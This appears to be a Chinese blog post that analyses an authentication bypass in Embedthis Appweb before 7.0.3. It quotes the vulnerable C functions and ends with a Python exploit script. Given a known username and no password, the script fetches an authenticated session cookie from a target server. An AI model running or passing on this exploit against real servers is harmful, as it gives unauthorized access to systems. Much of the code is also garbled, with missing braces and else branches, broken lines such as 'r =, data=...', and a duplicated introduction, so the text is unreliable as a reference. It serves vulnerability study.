



Web服务器一般指网站服务器,是指驻留于因特网上某种类型计算机的程序,可以处理浏览器等Web客户端的请求并返回相应响应,也可以放置网站文件,让全世界浏览;可以放置数据文件,让全世界下载。目前最主流的三个Web服务器是Apache、 Nginx 、IIS。

Java 对接

Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对ServletJavaServer PageJSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。但是,不能将Tomcat和Apache HTTP服务器混淆,Apache HTTP服务器是用C语言实现的HTTPWeb服务器;这两个HTTP web server不是捆绑在一起的。Apache Tomcat包含了配置管理工具,也可以通过编辑XML格式的配置文件来进行配置。


Tomacat是由Apache推出的一款免费开源的Servlet容器,可实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。




Web服务器一般指网站服务器,是指驻留于因特网上某种类型计算机的程序,可以处理浏览器等Web客户端的请求并返回相应响应,也可以放置网站文件,让全世界浏览;可以放置数据文件,让全世界下载。目前最主流的三个Web服务器是Apache、 Nginx 、IIS。

Java 对接

Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对ServletJavaServer PageJSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。但是,不能将Tomcat和Apache HTTP服务器混淆,Apache HTTP服务器是用C语言实现的HTTPWeb服务器;这两个HTTP web server不是捆绑在一起的。Apache Tomcat包含了配置管理工具,也可以通过编辑XML格式的配置文件来进行配置。


Tomacat是由Apache推出的一款免费开源的Servlet容器,可实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。



AppWeb 可以进行认证配置,其认证方式包括以下三种(类似于Tomcat 的添加filter):

  • basic 传统 HTTP 基础认证

  • digest 改进版 HTTP 基础认证,认证成功后将使用 Cookie 来保存状态,而不用再传递 Authorization 头

  • form 表单认证

其 7.0.3 之前的版本中,对于 digest 和 form 两种认证方式,如果用户传入的密码为 null(也就是没有传递密码参数),appweb 将因为一个逻辑错误导致直接认证成功,并返回 session。

 漏洞源码 分析

static int authCondition(HttpConn *conn, HttpRoute *route, HttpRouteOp *op)
    HttpAuth *auth; //认证类
    cchar *username, *password;  //用户名和密码

    assert(conn);   //服务器链接
    assert(route);     //过滤链

    auth = route->auth;
    if (!auth || !auth->type)  //不需要走认证
        /* Authentication not required */
        return HTTP_ROUTE_OK;
    if (!httpIsAuthenticated(conn))
        httpGetCredentials(conn, &username, &password);  //调用httpGetCredentials 为用户名和密码赋值
        if (!httpLogin(conn, username, password))  //调用httpLogin
            if (!conn->tx->finalized)
                if (auth && auth->type)
                    httpError(conn, HTTP_CODE_UNAUTHORIZED, "Access Denied, login required");
                /* Request has been denied and a response generated. So OK to accept this route. */
            return HTTP_ROUTE_OK;
    if (!httpCanUser(conn, NULL))
        httpTrace(conn, "auth.check", "error", "msg:'Access denied, user is not authorized for access'");
        if (!conn->tx->finalized)
            httpError(conn, HTTP_CODE_FORBIDDEN, "Access denied. User is not authorized for access.");
            /* 请求已被拒绝并生成响应。接受这条路线好吗 */
    /* OK to accept route. This does not mean the request was authenticated - an error may have been already generated */
    return HTTP_ROUTE_OK;

 获取用户名和密码凭据。. 如果使用协议内身份验证方案(如basic | digest), trx->authDetails将包含凭据,并且将调用parseAuth回调来解析。

 判断是否需要认证 ,如果不需要 就直接返回


 此函数接收两个指向字符数组的指针,这些指针将包含从请求解析的用户名和密码。由于身份验证条件中没有检查,因此"parseAuth"函数是否失败并不重要,这意味着我们可以插入 WWW 身份验证标头或后数据中进行身份验证,以进行我们想要的任何字段的身份验证:
PUBLIC bool httpGetCredentials(HttpConn *conn, cchar **username, cchar **password)
    HttpAuth *auth;

    *username = *password = NULL;

    auth = conn->rx->route->auth;
    if (!auth || !auth->type)
        return 0;
    if (auth->type)
        if (conn->authType && !smatch(conn->authType, auth->type->name))
            if (!(smatch(auth->type->name, "form") && conn->rx->flags & HTTP_POST))
                /* 如果是已发布表单验证,则忽略请求中 any basic|digest details in request */
                return 0;
        if (auth->type->parseAuth && (auth->type->parseAuth)(conn, username, password) < 0)

            return 0;
        *username = httpGetParam(conn, "username", 0);
        *password = httpGetParam(conn, "password", 0);
    return 1;

此函数将检查用户名是否为空,当已关联会话时,密码指针可以改为 null。
PUBLIC bool httpLogin(HttpConn *conn, cchar *username, cchar *password)
    HttpRx *rx;   
    HttpAuth *auth; //认证
    HttpSession *session;  //session 信息
    HttpVerifyUser verifyUser;  //验证用户

    rx = conn->rx;
    auth = rx->route->auth;
    if (!username || !*username)  //判断用户名是否为空
        httpTrace(conn, "auth.login.error", "error", "msg:'missing username'");
        return 0;
    if (!auth->store)
        mprLog("error http auth", 0, "No AuthStore defined");
        return 0;
    if ((verifyUser = auth->verifyUser) == 0)
        if (!auth->parent || (verifyUser = auth->parent->verifyUser) == 0)
            verifyUser = auth->store->verifyUser;
    if (!verifyUser)
        mprLog("error http auth", 0, "No user verification routine defined on route %s", rx->route->pattern);
        return 0;
    if (auth->username && *auth->username)
        /* 如果使用自动登录,替换用户名 */
        username = auth->username;
        password = 0;
    if (!(verifyUser)(conn, username, password))
        return 0;
    if (!(auth->flags & HTTP_AUTH_NO_SESSION) && !auth->store->noSession)
        if ((session = httpCreateSession(conn)) == 0)
            /* Too many sessions */
            return 0;
        httpSetSessionVar(conn, HTTP_SESSION_USERNAME, username);
        httpSetSessionVar(conn, HTTP_SESSION_IP, conn->ip);
    rx->authenticated = 1;
    rx->authenticateProbed = 1;
    conn->username = sclone(username);
    conn->encoded = 0;
    return 1;
<em>File http/httpLib.c – function configVerfiyUser()</em>
The following function will first check for the presence of a valid user, either because it was already set in the session, or because it was passed, since we are able to pass a null password (line ), we can bypass the actual checks and successfully authenticate reaching line .
 static bool configVerifyUser(HttpConn *conn, cchar *username, cchar *password)
    HttpRx *rx;
    HttpAuth *auth;
    bool success;
    char *requiredPassword;

    rx = conn->rx;
    auth = rx->route->auth;
    if (!conn->user && (conn->user = mprLookupKey(auth->userCache, username)) == 0)
        httpTrace(conn, "auth.login.error", "error", "msg: 'Unknown user', username:'%s'", username);
        return 0;
    if (password)
        if (auth->realm == 0 || *auth->realm == '\0')
            mprLog("error http auth", 0, "No AuthRealm defined");
        requiredPassword = (rx->passwordDigest) ? rx->passwordDigest : conn->user->password;
        if (sncmp(requiredPassword, "BF", 2) == 0 && slen(requiredPassword) > 4 && isdigit(requiredPassword[2]) &&
            requiredPassword[3] == ':')
            /* Blowifsh */
            success = mprCheckPassword(sfmt("%s:%s:%s", username, auth->realm, password), conn->user->password);
            if (!conn->encoded)
                password = mprGetMD5(sfmt("%s:%s:%s", username, auth->realm, password));
                conn->encoded = 1;
            success = smatch(password, requiredPassword);
        if (success)
            httpTrace(conn, "auth.login.authenticated", "context", "msg:'User authenticated', username:'%s'", username);
            httpTrace(conn, "auth.login.error", "error", "msg:'Password failed to authenticate', username:'%s'", username);
        return success;
    return 1;
View Code


import sys
import requests
import argparse
print """----------------------------------------------------------------
Embedthis Appweb/Http Zero-Day Form/Digest Authentication Bypass
def test_digest(r):
    auth = ["realm", "domain", "qop", "nonce", "opaque", "algorithm", "stale", "MD5", "FALSE", "Digest"]
    wwwauthenticate = r.headers.get('WWW-Authenticate')
    if wwwauthenticate is None:
        return False
    for k in auth:
        if k not in wwwauthenticate:
            return False
    return True
def test_form(r):
    """ extremely shoddy recognition, expect false positives """
    auth = [("X-XSS-Protection", "1; mode=block"), ("X-Content-Type-Options", "nosniff"), ("ETag", None), ("Date", None)]
    potential_auth = [("Last Modified", ""), ("X-Frame-Options", "SAMEORIGIN"), ("Accept-Ranges", "bytes"), ("Content-Type", "text/html")]
    if r.headers.get("WWW-Authenticate") is not None:
        return False
    for k, v in auth:
        rv = r.headers.get(k)
        if not rv:
            return False
        if v is not None and v != rv:
            return False
    potential_count = 0
    for k, v in potential_auth:
        rv = r.headers.get(k)
        if rv and v != "" and v == rv:
            potential_count += 1
    print "[+] Optional matchings: {}/{}".format(potential_count, len(potential_auth))
    return True
def test(url):
    """ Newer EmbedThis HTTP Library/Appweb versions do not advertise their presence in headers, sometimes might be proxied by nginx/apache, we can only look for a default headers configuration """
    r = requests.get(url)
    # EmbedThis GoAhead uses a similar headers configuration, let's skip it explicitly  如果使用就跳过
    serv = r.headers.get("Server")
    if serv and "GoAhead" in serv:
        return False
    if test_digest(r):
        return "digest"
    elif test_form(r):
        return "form"
    return None
def exploit(url, username="joshua", authtype="digest"):
    payload = { "username": username }
    headers = {
        "authorization": "Digest username={}".format(username),
        "user-agent": "TruelBot",
        "content-type": "application/x-www-form-urlencoded",
    if authtype == "digest":
        r = requests.get(url, data=payload, headers=headers)
        r =, data=payload, headers=headers)
    if r.status_code != 200 or len(r.cookies) < 1:
        print "[!] Exploit failed, HTTP status code {}".format(r.status_code)
    print "[*] Succesfully exploited, here's your c00kie:\n  {}".format(dict(r.cookies))
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Test&Exploit EmbedThis form/digest authentication bypass (CVE-XXXX-YYYY)")
    parser.add_argument('-t', '--target', required=True, help="specify the target url (i.e., http(s)://target-url[:port]/)")
    parser.add_argument('-u', '--user', required=True, help="you need to know a valid user name")
    parser.add_argument('-c', '--check', action='store_true', default=False, help="test for exploitability without running the actual exploit")
    parser.add_argument('-f', '--force', action='store_true', default=False, help="skip exploitability test")
    args = parser.parse_args()
    url =
    username = args.user
    t = "form" # default will try form/post
    if args.check or not args.force:
        t = test(url)
    if t is None:
        print "[!] Target does not appear to be Appweb/Embedthis HTTP with form/post auth (force with -f)"
        print "[+] Potential appweb/embedthis http, {} method".format(t)
    if not args.check:
        print "[!] Exploiting {}, user {}!".format(url, username)
        exploit(url, username, t)
View Code








posted @ 2021-02-05 16:44  PointerK  阅读(433)  评论(0编辑  收藏  举报